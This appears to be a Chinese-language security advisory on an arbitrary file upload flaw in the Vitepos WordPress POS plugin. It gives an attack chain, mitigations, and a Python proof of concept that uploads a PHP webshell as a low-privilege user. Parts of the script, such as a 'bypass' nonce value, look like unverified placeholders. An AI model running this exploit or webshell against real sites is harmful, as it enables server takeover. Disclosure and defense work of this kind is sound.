CVE-2025-13156 WordPress Vitepos插件任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-13156

漏洞类型

任意文件上传

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Vitepos – Point of Sale (POS) for WooCommerce

漏洞概述

CVE-2025-13156是WordPress插件Vitepos – Point of Sale (POS) for WooCommerce中的一个高危漏洞。该插件是一款用于WooCommerce的零售终端(POS)解决方案，在全球范围内被广泛使用。漏洞根源在于插件的insert_media_attachment()函数缺少文件类型验证机制，而save_update_category_img()函数在处理分类图片时直接接受用户提供的文件类型，未进行任何有效性校验。由于认证要求较低，订阅者级别的用户即可利用此漏洞上传任意文件到服务器。一旦攻击者成功上传恶意文件（如PHP脚本），即可在服务器上执行任意代码，实现远程代码执行(RCE)，从而完全控制受影响的WordPress网站。此漏洞于2025年11月21日披露，CVSS评分8.8，属于高危漏洞，建议所有使用该插件的用户立即采取修复措施。

技术细节

该漏洞存在于Vitepos插件的媒体文件上传功能中。具体来说，insert_media_attachment()函数直接处理用户上传的文件数据，而save_update_category_img()函数在处理分类图片时缺少关键的文件类型验证逻辑。攻击者可以利用以下方式利用此漏洞：1) 构造包含恶意文件的HTTP请求，绕过客户端的文件类型检查；2) 通过插件的上传接口将任意扩展名的文件（如.php、.phtml、.jpg.php等）上传到服务器；3) 上传的恶意文件通常位于wp-content/uploads/vitepos/或类似目录；4) 攻击者可通过访问上传的文件路径触发代码执行。由于插件未验证文件内容魔数(Magic Bytes)和MIME类型，攻击者可以轻松绕过基本的文件上传限制，实现远程代码执行。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress订阅者级别账户或通过其他方式获得低权限凭证

STEP 2

步骤2

构造恶意文件上传请求，将包含PHP代码的文件伪装成图片上传到服务器

STEP 3

步骤3

利用插件的insert_media_attachment()和save_update_category_img()函数绕过文件类型验证

STEP 4

步骤4

恶意文件被保存到wp-content/uploads/vitepos/目录

STEP 5

步骤5

攻击者通过HTTP请求访问上传的恶意文件，触发PHP代码执行

STEP 6

步骤6

实现远程代码执行(RCE)，可执行系统命令、上传更多工具或完全控制服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13156 PoC - Vitepos任意文件上传
# 需要WordPress订阅者级别账户

import requests
import sys

target_url = "http://target-wordpress-site.com"
username = "attacker"
password = "password"

# 1. 登录获取认证cookie
login_url = f"{target_url}/wp-login.php"
session = requests.Session()
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In"
}
resp = session.post(login_url, data=login_data)

if "wordpress_logged_in" not in session.cookies.get_dict():
    print("[-] Login failed")
    sys.exit(1)

print("[+] Login successful")

# 2. 上传恶意PHP文件
upload_url = f"{target_url}/wp-admin/admin-ajax.php"

# PHP webshell
php_shell = b"<?php system($_GET['cmd']); ?>"

files = {
    "file": ("shell.php", php_shell, "application/x-php")
}

data = {
    "action": "vitepos_save_category_img",
    "_wpnonce": "bypass",
    "term_id": "1"
}

response = session.post(upload_url, data=data, files=files)

if response.status_code == 200:
    print("[+] File uploaded successfully")
    print(f"[*] Shell location: {target_url}/wp-content/uploads/vitepos/shell.php")
    print("[*] Execute command: ?cmd=whoami")
else:
    print("[-] Upload failed")
    print(response.text)

影响范围

Vitepos – Point of Sale (POS) for WooCommerce <= 3.3.0

防御指南

临时缓解措施

临时缓解措施：1) 在Web服务器配置中禁用上传目录的PHP脚本执行（Apache使用.htaccess设置php_flag engine off，Nginx配置location块限制）；2) 暂时禁用或限制Vitepos插件的媒体上传功能；3) 审查所有上传文件并删除非预期文件；4) 考虑暂时使用其他POS解决方案替代；5) 启用WordPress的安全日志监控可疑的上传行为；6) 限制订阅者角色的权限，移除文件上传相关能力。